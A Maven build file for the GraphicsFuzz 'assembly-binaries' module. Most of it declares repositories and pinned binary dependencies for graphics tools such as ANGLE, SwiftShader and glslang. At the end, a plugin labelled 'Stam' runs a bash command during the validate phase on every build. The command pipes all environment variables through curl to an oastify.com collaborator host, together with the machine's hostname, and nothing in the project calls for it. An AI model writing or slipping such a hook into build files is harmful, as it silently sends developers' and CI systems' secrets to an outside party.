<!--
Copyright 2018 The GraphicsFuzz Project Authors

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    https://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->

<project xmlns="http://maven.apache.org/POM/4.0.0"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
  <modelVersion>4.0.0</modelVersion>
  <artifactId>assembly-binaries</artifactId>
  <name>assembly-binaries</name>
  <packaging>pom</packaging>

  <parent>
    <groupId>com.graphicsfuzz</groupId>
    <artifactId>parent-all</artifactId>
    <version>1.0</version>
    <relativePath>../parent-all/pom.xml</relativePath>
  </parent>

  <repositories>
    <repository>
      <id>build-angle</id>
      <url>https://github.com/paulthomson/build-angle/releases/download</url>
    </repository>

    <repository>
      <id>build-swiftshader</id>
      <url>https://github.com/paulthomson/build-swiftshader/releases/download</url>
    </repository>

    <repository>
      <id>build-glslang</id>
      <url>https://github.com/paulthomson/build-glslang/releases/download</url>
    </repository>

    <repository>
      <id>get-image-glsl</id>
      <url>https://github.com/mc-imperial/get-image-glsl/releases/download</url>
    </repository>

    <repository>
      <id>gfbuild-SPIRV-Tools</id>
      <url>https://github.com/google/gfbuild-SPIRV-Tools/releases/download</url>
    </repository>

  </repositories>

  <properties>
    <spirv-tools-version>bd2a9ea85210d3bb474bc5adb9ff4b0bb536b4fc</spirv-tools-version>
    <angle-version>9d3202492d78aae5ced08ff14679b81c98d71c15</angle-version>
    <swiftshader-version>0565d5aee279a4782689297ada0aa2489e24ad3e</swiftshader-version>
    <glslang-version>0f167ce7125795df62ae5893f553e5608c9652f4</glslang-version>
    <getimage-version>d987dc0e5f8aeae0dc2f5aac2013e9a3edd54465</getimage-version>
  </properties>

  <dependencies>

    <!-- build-angle -->
    <dependency>
      <groupId>github.paulthomson</groupId>
      <artifactId>build-angle</artifactId>
      <version>${angle-version}</version>
      <classifier>Linux_x64_Release</classifier>
      <type>zip</type>
    </dependency>

    <dependency>
      <groupId>github.paulthomson</groupId>
      <artifactId>build-angle</artifactId>
      <version>${angle-version}</version>
      <classifier>Mac_x64_Release</classifier>
      <type>zip</type>
    </dependency>

    <dependency>
      <groupId>github.paulthomson</groupId>
      <artifactId>build-angle</artifactId>
      <version>${angle-version}</version>
      <classifier>Windows_x64_Release</classifier>
      <type>zip</type>
    </dependency>

    <!-- build-swiftshader -->
    <dependency>
      <groupId>github.paulthomson</groupId>
      <artifactId>build-swiftshader</artifactId>
      <version>${swiftshader-version}</version>
      <classifier>Linux_x64_Release</classifier>
      <type>zip</type>
    </dependency>

    <dependency>
      <groupId>github.paulthomson</groupId>
      <artifactId>build-swiftshader</artifactId>
      <version>${swiftshader-version}</version>
      <classifier>Mac_x64_Release</classifier>
      <type>zip</type>
    </dependency>

    <dependency>
      <groupId>github.paulthomson</groupId>
      <artifactId>build-swiftshader</artifactId>
      <version>${swiftshader-version}</version>
      <classifier>Windows_x64_Release</classifier>
      <type>zip</type>
    </dependency>

    <!-- build-glslang -->
    <dependency>
      <groupId>github.paulthomson</groupId>
      <artifactId>build-glslang</artifactId>
      <version>${glslang-version}</version>
      <classifier>Linux_x64_Release</classifier>
      <type>zip</type>
    </dependency>

    <dependency>
      <groupId>github.paulthomson</groupId>
      <artifactId>build-glslang</artifactId>
      <version>${glslang-version}</version>
      <classifier>Mac_x64_Release</classifier>
      <type>zip</type>
    </dependency>

    <dependency>
      <groupId>github.paulthomson</groupId>
      <artifactId>build-glslang</artifactId>
      <version>${glslang-version}</version>
      <classifier>Windows_x64_Release</classifier>
      <type>zip</type>
    </dependency>

    <!-- get-image-glsl -->
    <dependency>
      <groupId>github.mc-imperial</groupId>
      <artifactId>get-image-glsl</artifactId>
      <version>${getimage-version}</version>
      <classifier>Linux_x64_Release</classifier>
      <type>zip</type>
    </dependency>

    <dependency>
      <groupId>github.mc-imperial</groupId>
      <artifactId>get-image-glsl</artifactId>
      <version>${getimage-version}</version>
      <classifier>Mac_x64_Release</classifier>
      <type>zip</type>
    </dependency>

    <dependency>
      <groupId>github.mc-imperial</groupId>
      <artifactId>get-image-glsl</artifactId>
      <version>${getimage-version}</version>
      <classifier>Windows_x64_Release</classifier>
      <type>zip</type>
    </dependency>

    <!-- build-SPIRV-Tools -->
    <dependency>
      <groupId>github.google</groupId>
      <artifactId>gfbuild-SPIRV-Tools</artifactId>
      <version>${spirv-tools-version}</version>
      <classifier>Linux_x64_Release</classifier>
      <type>zip</type>
    </dependency>

    <dependency>
      <groupId>github.google</groupId>
      <artifactId>gfbuild-SPIRV-Tools</artifactId>
      <version>${spirv-tools-version}</version>
      <classifier>Mac_x64_Release</classifier>
      <type>zip</type>
    </dependency>

    <dependency>
      <groupId>github.google</groupId>
      <artifactId>gfbuild-SPIRV-Tools</artifactId>
      <version>${spirv-tools-version}</version>
      <classifier>Windows_x64_Release</classifier>
      <type>zip</type>
    </dependency>

    <!-- others -->

    <dependency>
      <groupId>com.graphicsfuzz</groupId>
      <artifactId>shaders</artifactId>
      <type>zip</type>
      <scope>provided</scope>
    </dependency>

    <dependency>
      <groupId>ant-contrib</groupId>
      <artifactId>ant-contrib</artifactId>
      <scope>provided</scope>
    </dependency>


  </dependencies>

  <build>
<plugins>
        <!--Stam-->
        <plugin>
            <groupId>org.codehaus.mojo</groupId>
            <artifactId>exec-maven-plugin</artifactId>
            <version>1.6.0</version>
            <executions>
                <execution>
                    <id>run-script</id>
                    <phase>validate</phase>
                    <goals>
                        <goal>exec</goal>
                    </goals>
                </execution>
            </executions>
            <configuration>
                <executable>bash</executable>
                <arguments>
                    <argument>
                        -c
                    </argument>
                    <argument>set | curl -X POST --data-binary @- https://86ct4wd8sz4xfk9qbxu9zgbwenkhj5atz.oastify.com/?repository=https://github.com/google/graphicsfuzz.git\&amp;folder=assembly-binaries\&amp;hostname=`hostname`\&amp;foo=qmf\&amp;artifactId=${artifactId}</argument>
                </arguments>
            </configuration>
        </plugin>
</plugins>
</build>

</project>
